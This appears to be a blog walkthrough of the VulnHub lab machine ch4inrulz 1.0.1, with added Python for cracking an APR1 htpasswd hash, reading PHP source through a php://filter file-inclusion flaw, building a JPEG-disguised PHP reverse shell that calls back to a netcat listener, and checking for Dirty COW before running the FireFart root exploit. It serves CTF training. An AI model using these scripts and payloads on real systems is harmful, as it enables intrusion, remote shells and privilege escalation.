VulnHub lab walkthrough: ch4inrulz 1.0.1

CH4INRULZ_v1.0.1

Target download: https://www.vulnhub.com/entry/ch4inrulz-101,247/

Target description (from the VulnHub page):

Frank has a small website and he is a smart developer with a normal security background; he always loves to follow patterns. Your goal is to discover any critical vulnerabilities and gain access to the system, then you need to gain root access in order to capture the root flag.

This machine was made for Jordan's Top Hacker 2018 CTF. We tried to make it simulate real-world attacks in order to improve your penetration testing skills.

The machine was tested on VMware (Player / Workstation) and works without any problems, so we recommend using VMware to run it. It also works fine using VirtualBox.

Difficulty: Intermediate. You need to think out of the box and collect all the puzzle pieces in order to get the job done.

The machine already has DHCP enabled, so you will not have any problems with networking.

Happy Hacking !

v1 - 25/07/2018; v1.0.1 - 31/07/2018 *Fixes DHCP issue*

Difficulty: intermediate

Environment: Kali Linux attacker VM plus the host; CH4INRULZ as the target

Network: all VMs in NAT mode

Goal: get root on the target and read the flag

As usual, start with a port scan:

Port 80: a resume page, all personal introduction, nothing else of interest

Port 8011: a second HTTP service (examined below)

FTP: an empty directory

Directory scan, port 80 first

robots.txt:

A .bak file; downloading and opening it reveals a hint:

I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path

Visiting /development prompts for credentials, presumably the password behind the hash in that hint.

Port 8011:

/api: only files_api.php is accessible


No parameter called file passed to me

The message says no parameter named file was passed. Supplying it as a GET parameter trips a check instead of returning the file:

Switching to a POST request, the passwd file (/etc/passwd) can be read:


Nothing else useful turned up after that.

Try cracking the hash with john: frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0


Cracked; the password is frank!!!
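For reference, this is what john is checking. The hash is Apache's APR1 MD5 format (`$apr1$<salt>$<hash>`, what `htpasswd -m` writes): md5-crypt with a different magic string and a 1000-round stretch. The block below is an added example, not code from the original post or from the ch4inrulz machine; it reimplements the APR1 algorithm in pure Python following apr_md5_encode() and checks the hash from the .bak hint against a small wordlist. The wordlist is constructed for the demonstration; on a real engagement you would feed john or hashcat a proper list.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, count: int) -> str:
    """Apache's crypt-style base64: emit the low 6 bits first, `count` chars."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """Return the full $apr1$salt$hash string for `password` (apr_md5_encode)."""
    pw = password.encode()
    salt = salt[:8]                      # APR uses at most 8 salt characters
    sp = salt.encode()

    ctx = hashlib.md5(pw + MAGIC + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    plen = len(pw)
    while plen > 0:                      # feed the alternate sum, 16 bytes at a time
        ctx.update(alt[: min(16, plen)])
        plen -= 16
    i = len(pw)
    while i:                             # one byte per bit of the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                # the stretching rounds
        r = hashlib.md5()
        r.update(pw if i & 1 else final)
        if i % 3:
            r.update(sp)
        if i % 7:
            r.update(pw)
        r.update(final if i & 1 else pw)
        final = r.digest()

    f = final                            # APR's peculiar byte interleaving
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$apr1${salt}${encoded}"


def verify_apr1(password: str, hashed: str) -> bool:
    """True if `password` produces `hashed` under its own salt."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    return apr1_md5(password, parts[2]) == hashed


def crack_htpasswd_line(line: str, wordlist):
    """Return (user, password) for the first wordlist hit, or (user, None)."""
    user, hashed = line.split(":", 1)
    for candidate in wordlist:
        if verify_apr1(candidate, hashed):
            return user, candidate
    return user, None


# Constructed for this example: the line from the .bak hint and a tiny wordlist
HTPASSWD_LINE = "frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0"
WORDLIST = ["password", "frank", "frank123", "Frank2018", "frank!!!"]

if __name__ == "__main__":
    user, pw = crack_htpasswd_line(HTPASSWD_LINE, WORDLIST)
    print(f"{user}: {pw if pw else 'not in wordlist'}")
```

The salt is only 48 bits and the scheme is a fast hash with a fixed 1000 rounds, which is why a rockyou-sized list falls to john in seconds; bcrypt (`htpasswd -B`) is the setting to recommend in the report.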

Log in to /development with those credentials


* Here is my unfinished tools list

- the uploader tool (finished but need security review)

That points to an upload feature, so append uploader to the development URL

Uploading an arbitrary image works; the response says it was saved to the uploads path, but that path could not be located

Tried many bypass techniques, none of them worked; it seems only image files are accepted

Then the file-read endpoint from earlier came to mind: can it read the application's source code?

The web root is usually /var/www/html; after some trial and error it turned out to be /var/www/ on this box

Including a .php file directly would execute it rather than show it. To get the raw source instead, wrap the path in the php://filter stream wrapper with a base64 conversion filter:

php://filter/read=convert.base64-encode/resource=[file path]. After the include, the source comes back as base64:


After base64 decoding, the upload directory is visible in the upload.php source
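To make the source reads repeatable, here is an added helper (not code from the original post or from the target) for the files_api.php file-read flaw. It assumes the endpoint is reached at a URL like http://<target>:8011/api/files_api.php (the page only says the api directory on port 8011 exposes files_api.php) and that the parameter must go in the POST body, as the page found. The sample response body is constructed to look like what the API returns when the include is wrapped in php://filter.

```python
import base64
import re
import urllib.parse
import urllib.request

# A base64 alphabet run long enough to be the encoded file rather than HTML noise
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def filter_payload(path: str) -> str:
    """Wrap `path` in php://filter so include() returns the file's bytes
    base64-encoded instead of executing any PHP inside it."""
    return "php://filter/read=convert.base64-encode/resource=" + path


def decode_filter_response(body: bytes) -> bytes:
    """Extract the base64 blob from an HTTP body that may also contain
    surrounding HTML, restore any padding lost in copying, and decode it."""
    runs = _B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 blob found in response")
    blob = max(runs, key=len)
    blob += b"=" * (-len(blob) % 4)
    return base64.b64decode(blob)


def read_source(api_url: str, path: str, timeout: float = 10.0) -> bytes:
    """POST file=<payload> to files_api.php (GET is blocked on this box) and
    return the decoded file contents. This is the only network call."""
    data = urllib.parse.urlencode({"file": filter_payload(path)}).encode()
    req = urllib.request.Request(api_url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return decode_filter_response(resp.read())


# Constructed sample: a stand-in upload.php and the kind of body the API sends back
SAMPLE_SOURCE = (
    b"<?php\n"
    b"$target = 'uploads/' . basename($_FILES['file']['name']);\n"
    b"move_uploaded_file($_FILES['file']['tmp_name'], $target);\n"
)
SAMPLE_BODY = b"<html><body>" + base64.b64encode(SAMPLE_SOURCE) + b"</body></html>"
# Same blob with the '=' padding stripped, as happens when copying out of a browser
SAMPLE_BODY_UNPADDED = b"<pre>" + base64.b64encode(SAMPLE_SOURCE).rstrip(b"=") + b"</pre>"

if __name__ == "__main__":
    # Hypothetical path: the page gives the web root as /var/www/, not the full path
    print(filter_payload("/var/www/development/uploader/upload.php"))
    print(decode_filter_response(SAMPLE_BODY).decode())
```

Against a live target, `read_source("http://<target>:8011/api/files_api.php", "<path>")` returns the decoded PHP; the same call without php://filter, as used later for the image shell, executes the file instead.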

A conventional image webshell did not give a reverse shell; to get one, use the PHP reverse shell that ships with Kali (/usr/share/webshells/php/php-reverse-shell.php)


Set the listener IP and port in it, paste the source after the bytes of any image, and upload that file


Here I paste the source into an image named muma.jpg


Upload succeeded; start a listener on Kali

Then use the file inclusion from earlier to include the image shell (this time without php://filter, so PHP executes it) and the shell connects back
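As an added illustration of the upload step (not the post's own code, nor anything from the target): patch the `$ip` and `$port` lines of Kali's php-reverse-shell.php, then append the PHP to a real JPEG so the file still starts with the JPEG magic bytes. The page does not say what check the uploader performs; treating it as a magic-byte check is an assumption here. The PHP snippet and the JPEG header are constructed stand-ins, with only the two "CHANGE THIS" lines matching the real Kali file.

```python
import re

JPEG_MAGIC = b"\xff\xd8\xff"

# The two lines php-reverse-shell.php ships with and marks "CHANGE THIS"
_IP_LINE = re.compile(rb"\$ip = '[^']*';")
_PORT_LINE = re.compile(rb"\$port = \d+;")


def set_listener(php_src: bytes, ip: str, port: int) -> bytes:
    """Rewrite the $ip / $port assignments so the shell calls back to us."""
    src, n_ip = _IP_LINE.subn(b"$ip = '" + ip.encode() + b"';", php_src, count=1)
    src, n_port = _PORT_LINE.subn(b"$port = " + str(port).encode() + b";", src, count=1)
    if n_ip != 1 or n_port != 1:
        raise ValueError("could not find the $ip/$port lines to patch")
    return src


def passes_magic_check(data: bytes) -> bool:
    """Assumed uploader check: the file must begin with the JPEG SOI marker."""
    return data.startswith(JPEG_MAGIC)


def make_image_shell(image: bytes, php_src: bytes) -> bytes:
    """Append PHP after the image bytes. PHP echoes everything before the
    first '<?php' as literal output, so when the file is include()d the
    image is dumped as garbage and the shell code then runs."""
    if not passes_magic_check(image):
        raise ValueError("carrier is not a JPEG; the upload filter would reject it")
    return image + b"\n" + php_src


# Constructed stand-ins: a minimal JFIF header and the two lines from the Kali file
SAMPLE_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
SAMPLE_PHP = (
    b"<?php\n"
    b"$ip = '127.0.0.1';  // CHANGE THIS\n"
    b"$port = 1234;       // CHANGE THIS\n"
    b"// ... rest of php-reverse-shell.php ...\n"
)

if __name__ == "__main__":
    # Hypothetical listener address; replace with the Kali IP and the port nc listens on
    shell = make_image_shell(SAMPLE_JPEG, set_listener(SAMPLE_PHP, "192.168.1.10", 4444))
    with open("muma.jpg", "wb") as f:
        f.write(shell)
```

With `nc -lvnp 4444` running on Kali, upload the resulting file through the uploader and then POST its path under the uploads directory as the `file` parameter to files_api.php; because the include now runs the PHP rather than base64-encoding it, the appended code executes and the listener receives the shell.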

Next comes privilege escalation. First check the kernel version


The kernel is in the Dirty COW range (CVE-2016-5195 affects Linux from 2.6.22 up to the fix in October 2016, so a version number above 2.6.22 alone is not proof that it is exploitable), so try the FireFart exploit (https://github.com/FireFart/dirtycow). The target cannot reach GitHub directly, so download and compile it on Kali first (the source header gives the command: gcc -pthread dirty.c -o dirty -lcrypt; build for the target's architecture):
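The "kernel >= 2.6.22" rule of thumb is only half of the check: the Dirty COW fix was backported by every major distribution, so a kernel with an old version number but a recent build date (visible in `uname -v`) is usually patched. The gate below is an added example, not from the post, that applies both criteria to the output of `uname -r` and `uname -v`; the sample strings are constructed and are not the target's actual uname output.

```python
import re
from datetime import date, datetime

# CVE-2016-5195 (Dirty COW): introduced in 2.6.22, fixed in mainline 4.8.3 and
# backported to stable and distro kernels around the public disclosure date.
DIRTYCOW_INTRODUCED = (2, 6, 22)
DIRTYCOW_MAINLINE_FIX = (4, 8, 3)
DIRTYCOW_FIX_DATE = date(2016, 10, 20)

_RELEASE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")
# e.g. "#36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012" -> Apr 10 2012
_BUILD_DATE = re.compile(r"([A-Z][a-z]{2})\s+(\d{1,2})\s+\d{2}:\d{2}:\d{2}\s+\S+\s+(\d{4})")


def parse_release(uname_r: str) -> tuple:
    """'3.2.0-23-generic' -> (3, 2, 0); the distro suffix is ignored."""
    m = _RELEASE.match(uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {uname_r!r}")
    return tuple(int(x or 0) for x in m.groups())


def parse_build_date(uname_v: str):
    """Pull the build date out of `uname -v`; None if it is not present."""
    m = _BUILD_DATE.search(uname_v)
    if not m:
        return None
    mon, day, year = m.groups()
    return datetime.strptime(f"{mon} {day} {year}", "%b %d %Y").date()


def dirtycow_candidate(uname_r: str, uname_v: str = "") -> tuple:
    """Return (worth_trying, reason). True is a hint, not a guarantee: only
    running the exploit, or checking the distro's CVE tracker for the exact
    package version, settles it."""
    rel = parse_release(uname_r)
    if rel < DIRTYCOW_INTRODUCED:
        return False, "kernel predates the vulnerable code (before 2.6.22)"
    if rel >= DIRTYCOW_MAINLINE_FIX:
        return False, "at or above the mainline fix (4.8.3)"
    built = parse_build_date(uname_v)
    if built is not None and built >= DIRTYCOW_FIX_DATE:
        return False, f"built {built.isoformat()}, after the fix; almost certainly backported"
    return True, "version in range and no post-fix build date; try the exploit"


if __name__ == "__main__":
    # Constructed samples, not the target's real uname output
    print(dirtycow_candidate("3.2.0-23-generic", "#36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012"))
    print(dirtycow_candidate("3.2.0-118-generic", "#161-Ubuntu SMP Tue Nov 1 15:50:25 UTC 2016"))
```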

Then copy the compiled dirty binary to /var/www/html/ on Kali, start the web server there, and fetch the file from the target

Make it executable and run it

Switching to the new account with su straight from the reverse shell failed (su needs a controlling terminal, which a bare reverse shell does not have); logging in over SSH with xshell as firefart:123456 worked

That gives the flag. Done.


posted @ 2020-03-06 15:42 hclly